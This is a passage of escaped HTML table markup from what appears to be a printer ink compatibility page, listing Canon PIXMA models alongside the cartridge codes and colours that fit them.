(Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td 